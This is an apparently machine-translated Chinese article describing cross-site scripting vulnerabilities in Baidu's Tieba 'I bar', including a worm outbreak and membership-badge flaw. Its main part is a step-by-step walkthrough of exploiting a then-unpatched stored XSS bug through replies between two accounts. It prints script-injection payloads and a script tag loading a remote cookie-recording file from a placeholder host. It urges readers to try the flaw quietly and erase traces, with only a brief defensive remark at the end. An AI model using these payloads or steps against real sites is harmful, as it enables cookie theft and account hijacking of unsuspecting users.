Baidu I bar 0day cross-site vulnerability

Often visit Baidu Bar readers may know, Baidu in last December 31 night and January 1 a total of 3 big 0day Cross-site vulnerability, are high-risk level, 2 bugs are related to the small game, the remaining one is the bar displayed in the Membership badge.

Before we say 0day of this article, let's look at how the previous 3 bugs were discovered and exploited.

First of all the first 2 bugs, in the afternoon of December 31 last year, the small game submission score algorithm was first compiled by one of my friends, and translated into the VBS scripting language, followed by the Chrome browser plug-in, you can directly write the score you want.

Then, I saw that there was-1 points, in the curiosity, I tried to use the public VBS script submitted a string of English, unexpectedly successfully submitted, and appeared on I bar:

Should show the value of the place actually can display English, I to Baidu's staff to make database ability expressed great suspicion. Next, is the author of another friend, see my show off immediately try to enter the <script> tag, yes, the script was executed! Unfortunately, this vulnerability was exposed too quickly, was soon repaired by Baidu staff, can not submit non-numeric characters. In the thought that no problem, in fact, for the small game to show off the 2nd bug outbreak gave sufficient preparation time.

In the same place, in addition to the score display problems, in front of the display of the name of the bar also has a problem.

Probably because this small game can play in the small game bar and gold miner Bar, so Baidu show off the game when also to submit the name of the stick, at this time, we tried to submit the "</a><script>alert (" xxx "); </script><a href= "xxx" > Gold miners "Such a name, yes, there are bullets out of the box, immediately deleted, to do the full preparation."

The next thing we all know, is on the January 1 night outbreak of 922EE virus, because are the highest score, we can see from the gold miner's rankings, there are more than 400 people per second the rate of infection, this is quite scary (922EE script virus code see attachment).

The same night exposure to another cross-site vulnerability is a member badge of the bug, due to insufficient preparation, was another person leaked out, so did not use, but that is "all" use loopholes! Because the member badge is near the avatar, so almost all see the use of the method to try to use this loophole, that time Baidu Bar frame constantly ah!

More interesting is Baidu in the January 6 update a post-bar version, incredibly to have already repaired the Membership badge bug burst again, but this time very fast in about 1 hours on the repair, it seems that once the patch is only temporary, after the update did not fix patch also get up.

Before the 3 major loopholes introduced here, but also worth mentioning is, in fact, the voting system before 4th also has a 0day loophole, in the voting option to write HTML code actually did not filter, directly written to the page code,

Unfortunately, I don't know why we can't execute script code directly, but we might use the cross iframe trick method to break the limits of the IFRAME. (Baidu is now in the post bar has been repaired, but in the time of the author's submission, I bar the voting system bug still exists) now we say that the loophole, but I must first affirm, please do not use this loophole to violate the laws and regulations of the matter oh ~ This loophole is for everyone to study the technology. When studying, please try to keep a low profile, preferably in the bar with the main permission to use, so that after the study can be easily removed traces.

First we need to prepare 2 accounts, one for the affected account (number 1th), one for the attack account (2nd).

Here I recommend you use Chrome browser, it can easily debug the page code.

First of all, the principle, this time the 0day loophole in I bar, it seems that Baidu did not do a good job testing can not wait to release the I bar.

Because Baidu I stick the mechanism of similar and micro-blog, will show the attention of the reply to the speech and so on data and their own replies received.

The problem appears in the display of the reply I received, I bar bar on the reply posted on the filter is done very closely, it will be part of the reply displayed in I bar, at this time, if the use of HTML code reply, in the bar can not see what, code will not be executed, but in I bar is not the same, It does not do any part of the text processing of the direct write to the Web page, there is a cross-site vulnerability! What we are going to do is to study it carefully.

First of all, we use number 1th to send a post first, this is to facilitate the preparation of the attack (we can use 2 browsers, this will be much easier). Then use number 2nd to reply to a bit of something (this is the test, you can not go back directly to the second step), see, 1th number of accounts under the User column appears a new reply prompt:

I believe that users who often use Baidu paste bar will not be blind to this hint.

In the second step, we use the well-designed script code to reply to number 1th, and for the sake of convenience, we test it with the following code:

<script>alert (Document.cookie);</script>

Since Baidu I bar display will add hyperlinks on it, so we'd better use </a> to close the hyperlink:

</a><script>alert (Document.cookie);</script><a>

Replies, to ensure that the final reply to the content of this code is valid, because I bar only show the last reply.

At this time, the operation of our number 2nd account has been completed, waiting for the account number 1th to review the reply! Click on the No. 1th account I paste in the reply to my:

Look, there is a dialog box, and notice that the page is just loaded into the back of the quotation marks, where our code is displayed. Then look at the source code of the webpage:

It is true that the content of our reply is written to the webpage.

Now, we will try to load the script file, I believe the following code readers are already familiar with it:

<scriptsrc= "Http://xxx" ></script>

It would be nice to replace the http://xxx with our script file address, where I tested the script file that recorded the cookies.

Because it is a reply we still add </a> and <a> back to the bar!

Post replies after the internal although the post is coded, but do not worry, the number 1th account also check the reply!

Go to number 1th I posted the reply to my page, sure enough, reply where the quotation marks are displayed on the page is empty, the use of chrome words directly in the quotation mark right click, select the review element, you can go directly to the right-click location of the mouse source code:

See, the code is plugged in!

Then look at the files on our server:

The cookie is recorded and our code is executed correctly!

Speaking of which, I believe the readers have understood what is going on. In addition, because of Baidu's defense system issues, sent to the post of unknown link, reply may be deleted, but I bar will still show the final reply, whether or not deleted, this mechanism can play a hidden attack role, which is called smart anti-smart wrong?

Baidu recently exposed the loopholes are a few high-risk loopholes, as a Web site developers, especially such a strong interaction of the site, these problems are worthy of our reference, we want to be as far as possible in any place on the site of a high-risk vulnerability to prevent attackers to use, to hang horses, to become the cradle of transmission virus.

Baidu I bar 0day Cross-site vulnerability